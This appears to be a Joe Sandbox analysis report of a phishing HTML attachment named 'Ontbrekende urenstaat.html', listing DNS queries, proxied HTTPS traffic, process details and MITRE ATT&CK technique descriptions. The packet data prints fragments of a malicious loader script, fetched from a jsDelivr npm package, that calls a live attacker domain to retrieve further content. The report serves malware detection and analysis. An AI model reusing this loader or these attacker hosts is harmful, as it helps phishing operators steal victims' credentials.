Mar 10, 2025 15:05:33.816756010 CET	55922	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:33.831650019 CET	53	55922	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:33.849725008 CET	53	50358	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:33.855885983 CET	53	63869	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:33.930459023 CET	53	56190	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:33.952316046 CET	65105	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:33.952466965 CET	51150	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:33.959568024 CET	53	51150	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:33.959638119 CET	53	65105	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:38.955137014 CET	53	49410	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:39.278878927 CET	57466	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:39.279109001 CET	55002	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:39.290735006 CET	53	57466	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:39.291181087 CET	53	55002	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:39.776592970 CET	63737	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:39.777303934 CET	55771	53	192.168.2.9	1.1.1.1
Mar 10, 2025 15:05:39.795077085 CET	53	55771	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:39.798176050 CET	53	63737	1.1.1.1	192.168.2.9
Mar 10, 2025 15:05:50.970534086 CET	53	52126	1.1.1.1	192.168.2.9
Mar 10, 2025 15:06:10.063390970 CET	53	58797	1.1.1.1	192.168.2.9
Mar 10, 2025 15:06:29.453550100 CET	53	65050	1.1.1.1	192.168.2.9
Mar 10, 2025 15:06:32.516815901 CET	53	54582	1.1.1.1	192.168.2.9
Mar 10, 2025 15:06:34.891886950 CET	53	64547	1.1.1.1	192.168.2.9
Mar 10, 2025 15:07:02.439956903 CET	53	50908	1.1.1.1	192.168.2.9
Mar 10, 2025 15:07:03.562802076 CET	138	138	192.168.2.9	192.168.2.255
Mar 10, 2025 15:07:49.160223961 CET	53	59881	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 10, 2025 15:05:30.892563105 CET	192.168.2.9	1.1.1.1	0xe0f0	Standard query (0)	cdn.jsdelivr.net	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:30.892733097 CET	192.168.2.9	1.1.1.1	0x7d22	Standard query (0)	cdn.jsdelivr.net	65	IN (0x0001)	false
Mar 10, 2025 15:05:33.816589117 CET	192.168.2.9	1.1.1.1	0x504d	Standard query (0)	noirlegacy-panel-1.website	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:33.816756010 CET	192.168.2.9	1.1.1.1	0xf321	Standard query (0)	noirlegacy-panel-1.website	65	IN (0x0001)	false
Mar 10, 2025 15:05:33.952316046 CET	192.168.2.9	1.1.1.1	0x271b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:33.952466965 CET	192.168.2.9	1.1.1.1	0xd876	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 10, 2025 15:05:39.278878927 CET	192.168.2.9	1.1.1.1	0x2165	Standard query (0)	sun-shine.pages.dev	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:39.279109001 CET	192.168.2.9	1.1.1.1	0xab95	Standard query (0)	sun-shine.pages.dev	65	IN (0x0001)	false
Mar 10, 2025 15:05:39.776592970 CET	192.168.2.9	1.1.1.1	0xd7e1	Standard query (0)	noirlegacy-panel-1.website	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:39.777303934 CET	192.168.2.9	1.1.1.1	0x28a1	Standard query (0)	noirlegacy-panel-1.website	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 10, 2025 15:05:30.899761915 CET	1.1.1.1	192.168.2.9	0xe0f0	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 10, 2025 15:05:30.899761915 CET	1.1.1.1	192.168.2.9	0xe0f0	No error (0)	jsdelivr.map.fastly.net		151.101.1.229	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:30.899761915 CET	1.1.1.1	192.168.2.9	0xe0f0	No error (0)	jsdelivr.map.fastly.net		151.101.65.229	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:30.899761915 CET	1.1.1.1	192.168.2.9	0xe0f0	No error (0)	jsdelivr.map.fastly.net		151.101.193.229	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:30.899761915 CET	1.1.1.1	192.168.2.9	0xe0f0	No error (0)	jsdelivr.map.fastly.net		151.101.129.229	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:30.900779009 CET	1.1.1.1	192.168.2.9	0x7d22	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 10, 2025 15:05:33.831650019 CET	1.1.1.1	192.168.2.9	0xf321	No error (0)	noirlegacy-panel-1.website			65	IN (0x0001)	false
Mar 10, 2025 15:05:33.849725008 CET	1.1.1.1	192.168.2.9	0x504d	No error (0)	noirlegacy-panel-1.website		172.67.167.135	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:33.849725008 CET	1.1.1.1	192.168.2.9	0x504d	No error (0)	noirlegacy-panel-1.website		104.21.82.11	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:33.959568024 CET	1.1.1.1	192.168.2.9	0xd876	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 10, 2025 15:05:33.959638119 CET	1.1.1.1	192.168.2.9	0x271b	No error (0)	www.google.com		142.250.184.196	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:39.290735006 CET	1.1.1.1	192.168.2.9	0x2165	No error (0)	sun-shine.pages.dev		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:39.290735006 CET	1.1.1.1	192.168.2.9	0x2165	No error (0)	sun-shine.pages.dev		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:39.291181087 CET	1.1.1.1	192.168.2.9	0xab95	No error (0)	sun-shine.pages.dev			65	IN (0x0001)	false
Mar 10, 2025 15:05:39.795077085 CET	1.1.1.1	192.168.2.9	0x28a1	No error (0)	noirlegacy-panel-1.website			65	IN (0x0001)	false
Mar 10, 2025 15:05:39.798176050 CET	1.1.1.1	192.168.2.9	0xd7e1	No error (0)	noirlegacy-panel-1.website		172.67.167.135	A (IP address)	IN (0x0001)	false
Mar 10, 2025 15:05:39.798176050 CET	1.1.1.1	192.168.2.9	0xd7e1	No error (0)	noirlegacy-panel-1.website		104.21.82.11	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.jsdelivr.net

sun-shine.pages.dev

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.9	49706	142.250.184.195	80

Timestamp	Bytes transferred	Direction	Data
Mar 10, 2025 15:05:45.625426054 CET	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 10, 2025 15:05:46.295169115 CET	223	IN	HTTP/1.1 304 Not Modified Date: Mon, 10 Mar 2025 13:26:37 GMT Expires: Mon, 10 Mar 2025 14:16:37 GMT Age: 2349 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Mar 10, 2025 15:05:46.300919056 CET	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 10, 2025 15:05:46.491003990 CET	223	IN	HTTP/1.1 304 Not Modified Date: Mon, 10 Mar 2025 13:25:54 GMT Expires: Mon, 10 Mar 2025 14:15:54 GMT Age: 2392 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49693	151.101.1.229	443	4108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:05:32 UTC	552	OUT	GET /npm/slowingdown4u@1.0.2/hard.js HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-10 14:05:33 UTC	768	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2045 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: application/javascript; charset=utf-8 X-JSD-Version: 1.0.2 X-JSD-Version-Type: version ETag: W/"7fd-Bz5K/BIEx4xnErGQ3DRiIyww4mw" Accept-Ranges: bytes Age: 397445 Date: Mon, 10 Mar 2025 14:05:33 GMT X-Served-By: cache-fra-eddf8230139-FRA, cache-sjc1000143-SJC X-Cache: HIT, MISS Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2025-03-10 14:05:33 UTC	1378	IN	Data Raw: 0a 0a 63 6f 6e 73 74 20 75 72 6c 78 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6e 6f 69 72 6c 65 67 61 63 79 2d 70 61 6e 65 6c 2d 31 2e 77 65 62 73 69 74 65 2f 61 70 69 2f 75 75 75 72 72 6c 6c 6c 27 3b 0a 0a 0a 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 70 65 72 66 6f 72 6d 20 47 45 54 20 72 65 71 75 65 73 74 0a 20 20 20 20 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 66 65 74 63 68 44 61 74 61 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 72 65 73 70 6f 6e 73 65 20 3d 20 61 77 61 69 74 20 66 65 74 63 68 28 75 72 6c 78 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 Data Ascii: const urlx = 'https://noirlegacy-panel-1.website/api/uuurrlll'; // Function to perform GET request async function fetchData() { try { const response = await fetch(urlx); i
2025-03-10 14:05:33 UTC	667	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 64 79 6e 61 6d 69 63 50 61 72 74 20 3d 20 61 74 74 72 2e 6e 61 6d 65 2e 73 70 6c 69 74 28 27 6e 69 6b 65 2d 27 29 5b 31 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6b 65 79 20 3d 20 64 79 6e 61 6d 69 63 50 61 72 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 Data Ascii: let dynamicPart = attr.name.split('nike-')[1]; key = dynamicPart; } }); }); e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49703	188.114.96.3	443	4108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:05:43 UTC	655	OUT	GET / HTTP/1.1 Host: sun-shine.pages.dev Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-10 14:05:43 UTC	178	IN	HTTP/1.1 403 Forbidden Server: cloudflare Date: Mon, 10 Mar 2025 14:05:43 GMT Content-Type: text/html Content-Length: 553 Connection: close CF-RAY: 91e35e5bfc547ae8-SJC
2025-03-10 14:05:43 UTC	553	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49702	188.114.96.3	443	4108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 14:05:43 UTC	601	OUT	GET /favicon.ico HTTP/1.1 Host: sun-shine.pages.dev Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://sun-shine.pages.dev/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-10 14:05:44 UTC	178	IN	HTTP/1.1 403 Forbidden Server: cloudflare Date: Mon, 10 Mar 2025 14:05:44 GMT Content-Type: text/html Content-Length: 553 Connection: close CF-RAY: 91e35e5f5ec72510-SJC
2025-03-10 14:05:44 UTC	553	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 6032, Parent PID: 5600

General

Target ID:	0
Start time:	10:05:24
Start date:	10/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Ontbrekende urenstaat.html"
Imagebase:	0x7ff6fb300000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4108, Parent PID: 6032

General

Target ID:	1
Start time:	10:05:28
Start date:	10/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2236 /prefetch:3
Imagebase:	0x7ff6fb300000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6592, Parent PID: 6032

General

Target ID:	15
Start time:	10:08:28
Start date:	10/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5568 /prefetch:8
Imagebase:	0x7ff6fb300000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ontbrekende urenstaat.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 6032, Parent PID: 5600

General

Chronological Activities

Analysis Process: chrome.exePID: 4108, Parent PID: 6032

General

Chronological Activities

Analysis Process: chrome.exePID: 6592, Parent PID: 6032

General

Windows Analysis Report
Ontbrekende urenstaat.html